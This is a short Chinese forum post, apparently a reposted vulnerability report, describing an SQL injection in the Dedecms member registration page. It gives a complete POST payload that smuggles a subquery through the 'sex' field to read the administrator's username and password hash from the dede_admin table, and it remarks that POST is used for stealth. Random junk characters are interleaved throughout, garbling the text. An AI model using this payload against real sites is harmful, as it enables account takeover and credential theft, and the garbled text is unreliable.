漏洞类型: SQL注射漏洞
! Y: ]" L1 Z; B3 }$ K' [8 ?9 U& y简要描述:
4 q3 [$ ^ U* v- O$ O* @) f0 x5 Z/ A 0 i- E1 z( W. }7 e! M% d
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.. R$ p! h3 | V% K1 v5 b( M5 s' S" c
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.: L) S' L; M9 A5 \
详细说明:跟这个漏洞4 r/ } x3 W5 B/ ]! T0 P& i
0 _2 |$ Z, e" T: j0 \WooYun: Dedecms SQL注射导致审核机制绕过漏洞
. f9 [, [* e: p6 D* l是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
- x; \! B* C7 K- ?# PPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
8 `6 m* C' ]* m/ [( K9 @: N" V # G _7 N. `9 N% b! D7 Z1 f1 y& F6 D
www.political-security.com/member/reg_new.php1 k4 x5 [: K; t1 h9 a
9 L7 a! ?3 X8 {$ O4 _5 FPOST
% N' P7 h& G8 _- A! L5 g7 T. r
& R( u) R7 I1 Q& adopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&* y* y" W% [" y, O5 i8 C- i
userid=c4rp3nt3r&uname=c4rp3nt3r
0 Z1 E+ G, v; P&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
6 b& ~1 z$ i+ f+ j&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,$ \7 ~( f0 {( f3 C! W7 w: p# q# \
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
0 E- K) Q4 ~# I8 J0 A8 ~* V3 S. L3 d%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对